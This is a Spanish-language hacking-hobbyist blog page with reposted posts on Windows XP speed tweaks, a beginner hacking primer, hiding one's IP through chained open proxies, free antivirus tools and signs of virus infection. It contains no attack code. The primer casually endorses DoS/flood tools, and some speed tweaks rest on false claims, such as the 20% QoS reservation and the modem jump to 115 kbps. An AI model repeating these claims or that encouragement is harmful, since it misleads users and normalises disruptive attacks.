Música


Get a playlist! Standalone player Get Ringtones

LogicKey E-zine Primera Edicion  

Posted by ShadinessDark in


Descarga:
http://www.4shared.com/file/27781598/9a63560a/ezine.html

Fuente:
http://xianur0.blogspot.com/2008....on.html

Bueno esta es una nueva revista que hasta ahora han sacado la primra apenas
me entere de ella por mi bro zero bits la baje y me parecio buena ...
Es en español espero les guste...

Acelerar Conexion By: Geek Lord Venezuela [R00t] Team  

Posted by ShadinessDark in

Buenooo aki les traigo uns pekeños trucos para acelerar su banda ancha y poder usar su internet al cien x cierto.

Navegar mas rapido por internet

Para aumentar la velocidad de acceso a servidores HTTP, y visualizar las páginas Webs mas rápdio, sigue estos pasos:

Haz clic en el botón Inicio y luego sobre Ejecutar, escribe Regedit y pulsa el botón Aceptar.

Una vez estás en el editor del registro busca la siguiente cadena:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionInternetSettings

En la ventana de la derecha, crear o modificar los valores DWORD siguientes:

MaxConnectionsPerServer: doble clic sobre ese valor y escribir 4 decimal (para ADSL escribir 20)
MaxConnectionsPer1_0Server : doble clic sobre ese valor y escribir 8 en decimal (para ADSL escribir 20)

Esos valores corresponden al número de demandas simultáneas de acceso a un servidor de tipo 1 o 1.1. Cerrar Regedit y reiniciar Windows

Acelerar la conexión a internet: limitacion QoS de Windows Xp

Cuando se configura una conexión nueva con Windows XP, por defecto aparece agregado y marcado un servicio llamado Programador de Paquetes Qos.

Este servicio limita por la buenas un determinado ancho de banda para que Windows XP realice ciertas operaciones (entre las que supongo que se encontrará la descarga de nuevas actualizaciones).

Se supone que este servicio sirve para la optimización de redes locales (Quality of Service – Calidad del Servicio). Sin embargo, para los usuarios privados, que sólo tienen un PC en casa, este servicio QoS no es una función necesaria, sino una limitación del ancho de banda contratado que no hace falta para nada: Windows XP reserva el 20% del ancho de banda aunque el usuario cancele la función QoS. También se puede optar por desintalar el Programador de paquetes QoS si no tenemos ninguna Red Local.

Para quitar esta limitación limpiamente:

- Entrar con la cuenta de Administrador.

- Pulsar en Inicio-> ejecutar, y escribir: gpedit.msc

- Aparece una ventana con las directivas de grupo, hay que ir a Configuración de Equipo -> Plantillas Administrativas -> Red (Network) -> Programador de Paquetes Qos.

- Doble click en Limitar el ancho de banda reservado

- Habilitarlo y poner el 0% en Límite de Ancho de Banda. Aplicar y Aceptar

Por último hay que abrir las propiedades de la conexión red y comprobad que está marcado el Programador de Paquetes Qos. Es decir, que está activado como viene por defecto, pero no ocupará ningún ancho de banda

Windows XP Acelerar la navegación por LAN e Internet

Vamos a hacer una pequeña modificación en el registro que nos servirá para que Windows no busque Tareas Programadas en ordenadores remotos, para hacer más fluida la navegación. Para ello haz lo siguiente:

Inicio->Ejecutar-> Regedit.exe

localiza esta entrada:
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace

y elimina esta clave:

{D6277990-4C6A-11CF-8D87-00AA0060F5BF}

Acelerar velocidad del modem a 115,2 Kbps

Podemos acelerar la velocidad de un Modem de 56 kbps a 115 kbps. Para realizarlo:

1.- Inicio/Panel de contro/Opción de Inicio/Panel de control/Opción de teléfono/Modem/Propiedades
2.-En Comando de Inicializacion adicionales poner x0 y listo.

Si teneis algún comando anteriormente insertado, lo separais por ;
Ejemplo:

Antes modificación: ATM2S10=150
Después modificación: ATM2S10=150; x0

Ampliar flujo de datos

Para Acelerar la velocidad de conexion podemos configurar las opciones de MTU (maximum Transmission Unit) que designa el tamaño en bytes del datagrama mas granque que puede pasar por el protocolo de internet. Modificando esto conseguimos que circulen paquetes de datos mas grandes, los que nos beneficiara con una mayor velocidad de navegacion y descarga de archivos.
Para esto nos dirigimos al editor del registro (INICIO/EJECUTAR) y escribimos "regedit", pulsamos (ACEPTAR).
lo exploramos hasta encontrar la rama: HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Tcpip/Parameters/Interfaces y cremoas la clave "Adapter ID" (Edicion/Nuevo/Clave). Luego Creamos el valor DWORD (Edicion/Crear Valor DWORD) y lo llamamos "MTU" a la cula le agregamos el valor que nos convenga.
(576=DialUp 1480=ADSL 1500=Cablemodem).

Acelerar Banda Ancha

Vamos a "inicio/ejecutar/" y escribimos REGEDIT .

Una vez abierta la venta de registros, nos vamos a:

HKEY_local_machineSYSTEMCurrentControlSetServic esTcpip
Parameters

En la carpeta paremeters hacemos un click con el botón derecho de mouse y nos vamos a;
Nuevo/dword y le ponemos GlobalMaxTcpWindowSize y luego nos vamos a modificar y deben asegurase de que el código Binario sea Hexadecimal y le ponemos 7fff.
Esto es para acelerar levemente tu negación a Internet pero especialmente a los que usan Banda Ancha. ADSL/lan

Evitar El Cache De DNS Fallidos

Esto almacena la info de los servidores de nombres correctos o incorrectos.. deshabilitandolo evitaremos demoras producidas por direcciones invalidas.
Ejecutamos el editor del registro y buscamos la siguiente rama HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Dnscache/Parameters
editamos o creamos los siguientes valores DWORD e ingresamos los valores dados a continuacion
.NegativeCacheTime : 00000000
.NetFailureCacheTime : 00000000
.NegativeSOACacheTime : 00000000

Negociaciones mas rapidas en el acceso a Internet

Este truco consiste en acelerar el proceso de negociación de protocolos que se realizan cuando llamamos a nuestro proveedor de Internet.

Para acelerar este proceso al máximo y disminuir los problemas que pudieramos tener a la hora de la conexión debemos ir a Propiedades de cada conexión y verificar que sólo esté activado el protocolo TCP/IP en el apartado de Componentes; deberemos desactivar si no lo están los siguientes protocolos: NetBEUI e IPX/SPX

Comenzando By: ShadinessDark Venezuela [R00t] Team  

Posted by ShadinessDark in

Bienvenidos a el foro de Venezuela [R00t] Team por aca les habla ShadinessDark ...

Aca les pondre una guia mas omenos relacionada con su Aprendizaje gran parte de esto es mio
pero aca tambien tiene credito rush '' Aunque no lo conozco '' Pero me robo un poco de su tutorial
no me lo robo porque estoy poniendo autor jeje...

Bueno quizas muchos de uds. estan vueltos un ocho como yo cuando empece se preguntaran

¿Como comienzo estoy enrredado no se que hacer?

Bueno les digo que muchas personas les gusta leer un poco de cada cosa y quieren aprender de todo
al mismo tiempo pues ' Error ' primero tenemos que decidirnos porque rama ir ...

Quizas estan diciendo y este loco dice rama que sera rama ?

Bueno las ramas de el hacking con mis palabras hasta quizas me equivoque y empiecen a criticarme
este tipo es un pirata no sabe lo que dice jeje ... pero hasta donde yo tengo entendido hay muchos
tipos hay unas personas que se dedican a:

Los sistemas que continen mucha informacion ...

Otros se dedican a la Auditoria Informatica ...

Otros a la Ingeneria inversa (Cracking - Software - )

Tambien unos que se dedican a vulnerar sistemas ... Bueno eso lo dije al principio

Quizas en todo lo que dije me equivoque ??? Mmm quizas me estan diciendo este no sabe ni que es
esto ...

Bueno quizas no se o es que no se explicarme hasta ahora esta info la escribe ShadinessDark jeje ... para que no
se confudan con lo de arriba...

Bueno mi primer consejo seria que leas mucho empieza con teoria no empieces con practicas porque
asi de verdad te costara aprender empieza leyendo por lo menos si te vas por el lado de ...

Vulnerabilidades (Fue el que yo escoji)

Aja si te vas por esa parte te recomiendo que si vas a leer html, javascript, php etc...

Primero leas para que sirve?
Que funciones tiene cada uno ...

osea me explico mejor si yo quiero aprender javascript me voy a google y pongo JavaScript
me voy a la Wikipedia y miro el consejo basico que ponen hay...

Bueno yo me fui por la parte de Vulnerabilidades tampoco que soy un AZ soy un poco novato como uds...

Otro consejo para uds... '' Nunca digas mas alla de lo que no puedes hacer ''

Siempre es mejor ser callado y esperar que los demas piensen que eres una persona que nunca en su vida
aprendera nada porque es una perdida de tiempo nada mas ...

'MENTIRA SI SE LO PROPONEN SERAN GRANDES'

Deben estar diciendo Ok Ok ya entendimos .-. deja de hablar y pon mas ejemplos ...

Bueno ya ahora si me toca poner la parte de que tome de el tutorial de

Rush no pondre que lo hice yo porque simplemente no es mio ...

Ramas By: Rush

Hacking web o defaces ← aqui es para aquellos que quieren aprender sobre como vulnerar la seguridad de algún sitio web, aprenderán como entrar en servidores, y cambiar el index de la pagina, robar archivos, base de datos, pero principalmente aprenderán sobre como proteger un sitio web, servidores y todo lo relacionado a detección de fallos de programación.

Hacking Wireless ← aqui aprenderán sobre tecnologías inalámbricas, como proteger una red wifi y a su ves como vulnerar su seguridad, aprenderán como entrar en redes inalámbricas protegidas bajo encriptacion, o protegida con otros métodos.

Hacking en redes ← esta es casi igual ala anterior pero estamos hablando en esta en redes locales cabledas atraves de cables de red ethernet y otros podras vulnerar sistemas de redes locales empresariales y caseros, aprenderas como entrar en redes empresariales o comerciales entre otras.

Hacking en intrusión en sistemas ← jejeje aquí verán mas que nada los métodos de intrusión en sistemas en general, es decir aprenderán como ingresar a esquipos de otras personas, o redes corporativas y asu ves aprenderán como proteger dichos sistemas implementado nuevas medidas de seguridad, los métodos de intrusión varían siempre, generalmente mediante exploits,Netcat,troyanos,etc. y los métodos de seguridad tambien, ejemplos: Friwalls,anti virus,Puertos UDP, etc.

Hacking mediante programación ←←← Bueno en realidad mas que una tecnica de hacking es algo que forzosamente debes aprender si realmente te interesa el hacking, ya que mediante este método aprenderás a analizar mejor los sistemas, pero lo mas importante es que aprenderás a diseñar e implementar tus propias aplicaciones. ¿Aque me refiero en esto? Bueno sencillamente que en el hacking la persona que se ase con programas de terceras personas no es una persona en si que se le pueda llamar hacker o aficionado al hacking, simplemente es vista, como la vergüenza de loa seguridad informática. sin mencionar que en cualquiero método de hacking es necesario saver programar o por lo menos comprender los códigos de Exploits o herramientas de hack.

por otra parte un ejemplo sensillo son las tecnicas de flood, ddos, dos, etc.

...
Hasta hay llega pero todavia no he acabado de hablar jaja... ya deben estar aburrido de mi xxD
vamos haber en mi antiguo tutorial... hice uno parecido a este pero hable mal de eso de

Dos, DDos, Flood... (Porque muchos dicen que el DDos y Dos - Flood Son de lammers)

No no no no no ... Error eso lo dicen porque quizas ellos no saben ni que es un DDOS ni que es un DOS ni un FLOOD

No les hagas caso si algun dia te juzgan por usar herramientas pues tampoco le hagas caso esas son
personas ignorantes que piensan que todos nacimos con un libro en la mano y diciendo mama - papa.

no les recomiendo tampoco mucho el uso de herramientas jaja pero para comenzar son necesarias
si no me crees leete las revistas HackxCrack ...

ya hablando de las revistas HackxCrack seria un buen inicio para todos ' Aunque la primera habla de toryanos '
A mi no me gustan pero es exelente revista y si te interesan los troyanos hay podras hacerlo ...

y no andaras por los foros perdiendo el tiempo con preguntas como 'Como hago un troyano'
para que venga otro arrecho y te diga ' No pidas lammedades '
Ja... creo que los que dicen eso son los peores...

Otra cosita se que a muchos les gusta Robar Emails o como dicen muchos pero esa palabra no me gusta

'' Hackear '' Emails ... eso si no se los recomiendo

¿Porque no lo recomiendas?

Ah porque a ti no te gustaria que tu estuvieras un messenger con 200 contactos y entre ellos este tu familia
o un primo o prima muy lejanos y te roben el email verdad que no te gustaria?

Ah bueno si no te gusta no lo hagas no hagas lo que no te gusta que te hagan... (Otro consejo) ....

Bueno ya yo creo que aca les quedo bien claro como empezar verdad? Creo que me explique demasiado
hasta sueño les dio jaja no es mi culpa solo que me inspire mucho jajaja ...

Recuerda que casi todo el tutorial es mio ¬¬ ajajaja

No no pero tambien le doy creditos a rush (Aunque no lo conozco)
pero como dije arriba de igual le doy creditos por el nacio este tema
ya que el hizo uno por donde empezar jejejeje ...

Saludos a todos especialmente a mi team

Venezuela [R00t] Team ...

Entre ellos

Zero bits
Geek Lord
Jeferx
K4mus23

Un saludo a mi brother

MaNdItOo

Otro saludo a los users HackxCrack ...

Fuente: http://zonehacking.ucoz.org/forum

Como Esconder la IP  

Posted by ShadinessDark in

Como Esconder la IP



Para empezar, te recomiendo buscar textos sobre wingates, socks y proxies (además, dehabilitá el java, javascript, cookies, links relacionados y actualización automática ... y tené en cuenta que si pretendés ocultar tu identidad, Internet Explorer no es la mejor opción). Intenta también instalar un firewall o DHCP...

Hay situaciones en las cuales queremos visitar un site sin dejar rastros en él, puede que tengas ganas de espiar el site de la competencia. Tu visita quedará registrada en un archivo LOG del servidor. Los visitantes frecuentes generan muchos registros.

Estos registros pueden brindar información al administrador de la red, información que es enviada desde nuestra PC sin que nos enteremos.

Sin embargo, para que el servidor guarde estos datos no necesita hacer pruebas demasiado sofisticadas. Un "snooper" dedicado podría averiguar mucho más. Ha habido algunos casos de sitios que han intentado acceder al disco rígido del visitante (un caso un tanto extremo). También hay miles de casos que involucran cookies (http://www.illuminatus.com/cookie.fcgi), código javascript y applets java malintencionados, agujeros de seguridad en los navegadores, etc, así que la mejor opción es navegar con un intermediario que entre a los sitios por nosotros.

Paso 1 - Determinar tu dirección IP:

Para averiguar tu propia dirección IP andá a http://megawx.aws.com/support/faq/software/ip.asp

Cada computadora conectada a Internet tiene un número identificador único llamado "dirección IP". En la mayoría de las redes la dirección IP de una PC es siempre la misma. En algunas otras, ésta se asigna cada vez que la PC se conecta a la red. A eso me refiero cuando pregunto si tenés dirección estática o dinámica. Si tu IP es dinámica seguro que será distinta cada vez que te conectes.

Hay una explicación muy completa sobre números IP (qué son y cómo funcionan) AQUÍ

Paso 2 - Lograr navegar anonimamente:

Método 1: Anonymizer

Cualquiera puede navegar anonimamente con la ayuda de un excelente servicio llamado "Anonymizer x" (http://www.anonymizer.com/3.0/index.shtml). Visitalo y escribí allí el URL que querés ver anónimamente ("Anonymizer" hace todo el trabajo por vos, eliminando varios peligros potenciales). Cuando seguís un link que hay en una página a la que entraste via Anonimyzer, el mismo se abre también via Anonymizer, de modo que no tengas que tipear a mano todas las direcciones a las que quieras ir. Este sitio te da la opción de pagar el servicio o usarlo gratis, pero si lo usamos gratis nos encontraremos con una serie de limitaciones, tales como una demora de 30 segundos en la descarga de la página, y acceso anónimo sólo a sitios con protocolo HTTP (no HTTPS ni FTP). Por otra parte, existen sitios que son inaccesibles a través de Anonymizer, como ser algunos servidores de e-mail por web.

Otro servicio que nos puede prestar Anonymizer es el de "acercarnos" las páginas web lejanas, por ejemplo, si una página está ubicada en Japón y algún problema de enlace no nos permite conectarnos rápidamente (es decir: no la podemos ver), podemos pedirle a Anonymizer que entre a ella por nosotros y nos la muestre luego. Probablemente Anonymizer tenga un mejor enlace con Japón que el que tenemos nosotros, y esto nos solucionaría el problema. Por último, hay algunos sitios que nos muestran distinta información de acuerdo al lugar geográfico desde el cual entremos. Por ejemplo: El sitio de la Enciclopedia Británica (en la sección dedicada a "enviar el pedido de compra") ofrece un listado de representantes en cada país, pero al entrar a través de Anonymizer aparece en su lugar otra página en la cual podemos ver los precios que tienen en USA (hogar de Anonymizer). No es dificil imaginar que los precios de los representantes son varias veces mayores que los precios en USA.

Anonymizer es una de las herramientas más populares para navegar anonimamente, pero no es la única. Continuamente aparecen sitios que ofrecen servicios similares. Una buena alternativa es JANUS (http://www.rewebber.de/) ubicado en Alemania. Es rápido, puede encriptar el URL, y además es gratuito. Lo siguiente es un fragmento de las aclaraciones que hay en el sitio de JANUS:

"JANUS es capaz de encriptar los URLs (las direcciones de las páginas) de modo que puedan ser usadas como referencia al servidor. Si se da el caso en que una dirección encriptada sea solicitada, JANUS podrá desencriptarla y reenviarla al servidor, sin necesidad de que el usuario sepa cuál es la verdadera dirección. Todas las referencias en la respuesta del servidor son encriptadas también, antes de que lleguen al usuario." (una variante muy interesante al servicio de anonimato... anonimato para servidores!)

Metodo 2: Servidores Proxy

También es posible lograr el anonimato en la navegación interponiendo un servidor proxy. Este servicio es similar al de Anonymizer, ya que las páginas son solicitadas por el proxy en lugar de la persona que realmente está navegando. Pero hay algunas diferencias muy importantes: los proxies no filtran los cookies, applets ni código malintencionados. En definitiva, lo único que hacen es ocultar nuestra posición geográfica.

Casi todos los servidores proxy tienen el acceso restringido a los usuarios del proveedor en el cual se encuentra, es decir... si usamos Fibertel no podremos utilizar el proxy de Sinectis (el acceso será denegado). Por suerte, siempre hay por allí algún proxy generoso que ofrece sus servicios al público en general, intencionalmente o debido a un error en la configuración (claro que los motivos suelen no ser públicos).

Cómo podemos encontrar estos Proxies "generosos"? Buena noticia para los perezosos: hay muchas listas de servidores proxy públicos, sin ir más lejos: http://tools.rosinstrument.com/cgi-bin/dored/cgi-bin/fp.pl/showlog

Para quienes no son tan perezosos: encuentren sus propios servidores proxy, es fácil. Vayan a Altavista (www.altavista.com) y escriban algo como +proxy +server +configuration +port, y van a recibir la lista de páginas web en las que los proveedores de Internet dan instrucciones completas a sus usuarios sobre cómo configurar sus navegadores para usar sus proxies. Prueben con cada proxy que hayan encontrado, y luego de 6 o 7 fallas (servicios "restringidos") encontrarán seguramente uno que ande. Suponiendo que hayan encontrado uno, digamos cualquier.proxy.com, HTTP port 8080. Para hacerlo funcionar en tu conección tenés que llenar (en tu navegador) los datos en la sección "Configuración manual de servidor proxy".

Configurando:

En Netscape Communicator:
Editar - Preferencias - Avanzado - Proxies - Configuración manual de proxy - Ver, y para HTTP y FTP escribí el nombre de tu servidor (ejemplo: proxy.datafull.com) y número de port (ejemplo 3128).

En Internet Explorer 4.0:
Ver - Opciones de Internet - Conexiones - marcar "Acceder a Internet usando un servidor proxy". Donde dice DIRECCIÓN escribir el nombre (ejemplo: proxy.datafull.com) y en PORT escribir el número de puerto (ejemplo: 3128), hacer click en opciones avanzadas y marcar donde dice "Usar el mismo proxy para todos los protocolos".

Una vez hecho todo esto ya podés empezar a navegar dejando el rastro de que estás en Bulgaria, USA, Corea del Norte o donde quiera que se encuentre el proxy, pero ...aún hay un tema importante a tener en cuenta, "¿Mi proxy... es realmente anónimo?"

¿Mi proxy es realmente anónimo?

No todos los proxies son del todo anónimos. Algunos de ellos dejan que el administrador del sistema (del sitio visitado) averigüe la dirección IP desde la cual nos estamos conectando al proxy, o sea, nuestra dirección IP real. Una vez que estés usando un proxy vas a poder hacerle una prueba de anonimato en la siguiente dirección: http://www.tamos.com/bin/proxy.cgi

Si recibís el mensaje "Proxy server is detected!" - entonces hay un agujero de seguridad en el proxy que estás usando, y los servidores web es capaz de averigüar tu verdadero IP. La información sobre tu verdadero IP va a aparecer en la página web. Si el mensaje que recibís es "Proxy server not detected" - significa que estás navegando anónimamente. De todos modos recomiendo estudiar cuidadosamente la lista de direcciones IP que esa página nos devuelva. Ninguno de ellos debería ser el tuyo. También podés realizar otras pruebas para ver si tu navegador es anónimo. Dichas pruebas pueden darte una lista completa de parametros que tu navegador deja saber al sitio web que visitas. (esa información está contenida en las llamadas "variables de entorno"). Proxys-4-All (http://proxys4all.cgi.net/tools.html) siempre tiene una larga lista de testeadores para esto.

Consideraciones Finales:

A pesar de todo lo dicho anteriormente ... usá proxies sólo cuando sea necesario. Navegar a través de proxies reduce considerablemente la velocidad de la transferencia de datos. Otra consideración importante que la gente suele olvidar: usá los proxies para propositos legales. Esconder tu identidad es aceptable si no querés que los servidores recopilen datos sobre vos, pero si ocultas tu IP para comprar CD´s, libros o software con una tarjeta de crédito falsa hay una buena posibilidad de que termines en la carcel, eso sin contar los aspectos morales. No te olvides de que todas las conexiones son logeadas, y si violaste una ley podrías ser rastreado, al menos en los países en los cuales la ley actúa en serio. El adminstrador del sitio podría leer los registros y contactar al administrador del proxy, y este último leería los suyos y averiguaría tu IP verdadero, entonces ambos contactarían a tu proveedor de Internet y ya tendrían tu nombre y dirección, y si usaste una cuenta que no es tuya, al menos tendrían el teléfono desde el cual llamaste... espero que haya quedado claro.

Especial para paranoicos:

Esto es interesante: Las herramientas que vimos hasta ahora pueden ser encadenadas!
Por ejemplo, si estás usando el Proxy A, y sabés las direcciones de otros dos proxies (Proxy B y Proxy C). La dirección que deberías solicitar sería algo así como http://proxyB:puerto/http://proxyC:puerto/http://www.lapagina.com ... Como resultado, accederías a www.lapagina.com a través de 3 proxies anónimos: A (que está configurado en el browser) B y C (que están en el url que escribiste).

Otro ejemplo más realista podría ser: http://proxy.usnowear.com:8080/http....ttp

Cuidado: No todos los proxies permiten ese tipo de encadenado.

SocksCap - para usar anónimamente aplicaciones que no sean HTTP (telnet, ftp, ICQ, RealPlayer, etc)

Qué es SocksCap?
SocksCap permite que las aplicaciones clientes basadas en TCP y UDP pasen a través de un firewall ubicado en un servidor del tipo SOCKETS. SocksCap intercepta las llamadas hechas a la red desde aplicaciones WinSock y las redirige a través de un server SOCKS de manera transparente para las aplicaciones o el sistema operativo y drivers.

Cuál es la última versión?
La versión actual de SocksCap16 (16-bit) es la 1.02. La versión más reciente de SocksCap32 (32-bit) es la 1.03. También existe una versión beta de SocksCap32 Version 2 (Beta 3).

Cuál es la diferencia entre SocksCap, SocksCap16, y SocksCap32?
El número se refiere a las versiones de 16 y 32 bits. SocksCap16 es la version de 16-bits. SocksCap32 es la de 32-bits.

Necesito SocksCap16, SocksCap32, o los dos?
Para Windows 3.1 y Windows para trabajo en grupo 3.11 necesitás SocksCap16.
Para Windows 95 y Windows 98 necesitás SocksCap32 para las aplicaciones de 32-bits. Si además estás ejecutando alguna aplicación de 16 bits (algún programa viejo quizás) bajo Windows 95 o 98, necesitás SocksCap16 para esas aplicaciones. Es posible ejecutar SocksCap16 y SocksCap32 a la vez para manejar todas las aplicaciones (de 16 y 32 bits).
En Windows NT o 2000, usá SocksCap32. (Estos sistemas operativos no permiten software de 16 bits.

Dónde puedo conseguir SocksCap?
SocksCap está disponible para descarga en el sitio web de SOCKS en: http://www.socks.nec.com/.

SocksCap es gratis? Y el codigo fuente, está disponible?
El programa se puede bajar gratis del sitio web de SOCKS. No está librado al dominio público. Su uso y distribución está restringido y sujeto a ciertos acuerdos. El código fuente no está disponible.

Funciona con todas las aplicaciones?
SocksCap funciona independentemente de las aplicaciones que usemos, pero puede presentar algunos problemas en ciertos casos.

Cómo sé si funciona con mi aplicación?
La mejor manera de saber eso es probarlo. Podrías referirte a la tabla de aplicaciones con las cuales los usuarios han reportado éxito o fracaso. Bajate la lista de la sección SocksCap del sitio http://www.socks.nec.com/.

Es necesario que use el FTP en modo de transferencia pasiva?
FTP puede experimentar dificultades, dependiendo de la aplicación y el stack. Intenta sin el modo pasivo, si no anda, intenta con el pasivo.

Cómo se configuran el servidor de SOCKS y el puerto en el setup de SocksCap?
Escribe la dirección y puerto del servidor SOCKS que querés atravezar. Si no estás seguro de lo que eso quiere decir, contacta a tu ISP o administrador de red o firewall o consulta una lista en: http://tools.rosinstrument.com/proxy/1080.htm.

Autor : MartinC.

Fuente : http://www.portalhacker.net/hacker/esconderip.php

Antivirus Gratis  

Posted by ShadinessDark in

Antivírus Gratuitos

Ademas de las opciones por las que tenemos que pagar, podemos disponer de una serie de alternativas gratuitas para mantener nuestra computadora libre de virus. En algunos casos su interfaz no es tan agradable y completa, su nivel de confiabilidad y de detección es muy satisfactorio y alto.
Antivir Personal Edition:

Este software antivirus es desarrollo de una empresa Alemana llamada H+BEDV, y no obstante es gratuito, ofrece buenas herramientas y funciones, puede actualizarse de manera automática por Internet. Solo lo podemos encontrar disponible en ingles y aleman, tiene una interfaz un poco primitiva. Incluye escudo residente, detección de virus de macro y asistente de actualización.
Avast:

Es otra de las opciones disponibles en antivirus gratuitos, este es un producto checo. Tenemos que registrarnos como usuarios cada 14 meses, aunque sea gratuito y nos haran llegar una clave para la instalación. Ofrece la protección a cualquier cuenta de correo.
Clam Antivirus:

Este es un antivirus de código fuente abierto en C, que se distribuye mediante licencia GNU GPL2, usa la base de datos de Open Antivirus, recolecta información sobre códigos maliciosos. Esta disponible par plataformas como Linux, Solaris FreeBSD, MAC OSx, Risc 6000, AIX, e Intel.
AVG Antivirus System Free:

Desarrollado por una empresa Checa, y ofrece funcionalidades como AVG resident Shield, E-mail Scanner, Boot-up Scanner y el AVG control center. E una de las mejores soluciones gratuitas en antivirus que podemos encontrar.

Fuente: http://www.cafeonline.com.mx/virus/antivirus/antivirus-gratuitos.html

Sintomas de estar infectado  

Posted by ShadinessDark in

Sintomas de estar infectado por un virus.

A veces, ni siquiera un usuario experimentado se da cuenta de que un ordenador está infectado con un virus. Esto se debe a que los virus pueden esconderse entre archivos normales o camuflarse como archivos estándar. Esta sección contiene una descripción detallada de los síntomas de la infección, cómo recuperar datos después de un ataque y cómo prevenir que los datos sean corrompidos por los programas maliciosos.
Síntomas de infección

Existen varios síntomas que indican que su ordenador ha sido infectado. Si nota que a su ordenador le suceden “cosas extrañas”, por ejemplo:

* de pronto se muestran mensajes o imágenes inesperados
* se reproducen sonidos o música inusuales de forma aleatoria
* el lector de CD-ROM se abre y se cierra de forma misteriosa
* los programas se inician de pronto en su ordenador
* su cortafuegos le informa de que algunas aplicaciones intentan conectarse a Internet, aunque usted no las haya iniciado,

entonces es muy probable que su ordenador haya sido infectado por un virus. Además, existen algunos síntomas típicos que indican que su ordenador ha sido infectado vía correo electrónico:

* sus amigos mencionan que han recibido mensajes desde su dirección, y usted está seguro de no que usted no los ha enviado
* su bandeja de entrada contiene muchos mensajes sin la dirección del remitente o encabezado

Puede que estos problemas, sin embargo, no sean causados por virus. P. ej., los mensajes infectados que supuestamente vienen de su dirección pueden de hecho venir de un ordenador diferente.

Existe una variedad de síntomas secundarios que indican que su ordenador puede haber sido infectado:

* su ordenador se paraliza con frecuencia o encuentra errores
* su ordenador se vuelve lento cuando se inician los programas
* el sistema operativo no puede cargarse
* los archivos y carpetas han sido borrados o su contenido ha cambiado
* su disco duro es accedido con mucha frecuencia (la luz en su unidad principal parpadea de forma rápida)
* Microsoft Internet Explorer se paraliza o funciona de forma errática, ej. no puede cerrar la ventana de la aplicación

El 90% de las veces, los síntomas antes enumerados indican un problema de hardware o de software. Aunque es poco probable que dichos síntomas sean causados por un virus, usted debe utilizar su software antivirus para examinar su ordenador por completo.
Qué debe hacer si encuentra síntomas de infección

Si nota que su ordenador está funcionando de forma errática:

1. ?No se deje dominar por el pánico! Esta regla de oro podría prevenir la pérdida de datos importantes almacenados en su ordenador y ayudarle a evitar una tensión nerviosa innecesaria.
2. Desconecte su ordenador de Internet.
3. Si su ordenador está conectado a una Red de Área Local, desconéctelo.
4. Si el ordenador no puede iniciarse desde el disco duro (error al iniciar), intente iniciar el sistema en el Modo Seguro o desde el disco de inicio de Windows
5. Antes emprender cualquier acción, haga una copia de seguridad de todos los datos críticos a una unidad externa (un disco flexible, CD, flash memory, etc.).
6. Si no lo ha hecho antes, instale un programa antivirus.
7. Descargue las últimas actualizaciones de la base de datos de su antivirus. Si es posible, no utilice el ordenador infectado para descargar las actualizaciones, sino utilice el ordenador de un amigo, o un ordenador en la oficina, café Internet, etc. Esto es importante debido a que si usted está conectado al Internet, el virus puede enviar información importante a terceros o podría intentar enviarse a sí mismo a todas las direcciones de correo de su libreta de direcciones. Usted podría también intentar obtener actualizaciones para su software antivirus en CD-ROM del proveedor del software o distribuidores autorizados.
8. Realice un análisis completo del sistema.

Si no se encuentran virus durante el examen

Si no se encuentran virus durante el examen y los síntomas que le alarmaron están clasificados, probablemente usted no tenga de qué preocuparse. Compruebe todo el hardware y software instalado en su ordenador. Descargue los parches de Windows utilizando Windows Update. Desinstale el software sin licencia de su ordenador y elimine los archivos basura de sus discos duros.
Si se encuentran virus durante el análisis

Una buena solución antivirus le notificará si se encuentran virus durante la verificación y le ofrecerá varias opciones para tratar con los objetos infectados.

En la gran mayoría de los casos, los ordenadores personales están infectados por gusanos, programas troyanos o virus. En la mayoría de los casos, los datos perdidos pueden ser recuperados con éxito.

1. Una buena solución antivirus le proveerá la opción de desinfectar los objetos infectados, ponerlos en cuarentena, borrar los gusanos y troyanos. Un informe proveerá los nombres del software malicioso descubierto en su ordenador.
2. En algunos casos, puede que usted necesite una utilidad especial para recuperar datos que han sido corrompidos. Visite el sitio de su proveedor de software antivirus y busque información acerca del virus, troyano o gusano que infectó su ordenador. Descargue cualesquier utilidades especiales si están disponibles.
3. Si su ordenador ha sido infectado por virus que aprovechan las vulnerabilidades de Microsoft Outlook Express, puede limpiar completamente su ordenador desinfectando todos los objetos infectados, y después examinar y desinfectar la base de datos del cliente de correo. Esto asegura que los programas maliciosos no puedan ser reactivados cuando los mensajes que hubieran sido infectados antes del examen sean reabiertos. Usted debe descargar e instalar los parches de seguridad para Microsoft Outlook Express.
4. Lamentablemente, algunos virus no pueden ser removidos de los objetos infectados. Algunos de estos virus podrían corromper información en su ordenador, y puede ser imposible restaurar esta información. Si un virus no puede ser removido de un archivo, el archivo debe borrarse.

Si su ordenador ha sufrido un grave ataque de virus

Algunos virus y troyanos pueden causar serios daños a su ordenador:

1. Si usted no puede iniciar desde su disco duro (error al iniciar), trate de iniciar desde el disco de rescate de Windows. Si el sistema no puede reconocer su disco duro, esto significa que el virus dañó la tabla de partición del disco. En este caso, trate de recuperar la tabla de partición utilizando el scandisk, un programa estándar de Windows. Si esto no ayuda, contacte a un servicio de recuperación de datos de ordenador. El proveedor de su ordenador debería poder darle la dirección de tales servicios.

Si usted tiene instalada una utilidad de administración de disco, algunas de sus unidades lógicas podrían no estar disponibles cuando inicia desde el disco de rescate. En este caso, usted debe desinfectar todas las unidades accesibles, reiniciar desde el disco duro del sistema y desinfectar el resto de las unidades lógicas.

2. Recupere archivos y aplicaciones corrompidas utilizando copias de seguridad después de haber examinado la unidad que contiene estos datos.

Diagnóstico del problema utilizando herramientas estándar de Windows

Aunque esto no es recomendable a menos que usted sea un usuario experimentado, puede que usted quiera:

* comprobar la integridad del sistema de archivos en su disco duro (utilizando el programa CHKDSK) y reparar los errores del sistema de archivos. Si existe una gran cantidad de errores, debe hacer una copia de seguridad de los archivos más importantes en los medios de almacenaje removibles antes de reparar los errores
* verificar su ordenador antes de iniciar desde el disco de rescate de Windows
* utilizar otras herramientas estándar de Windows, por ejemplo, la utilidad scandisk

Para más detalles sobre cómo utilizar éstas herramientas, le remitimos a los temas de Ayuda de Windows.p>
Si nada ayuda

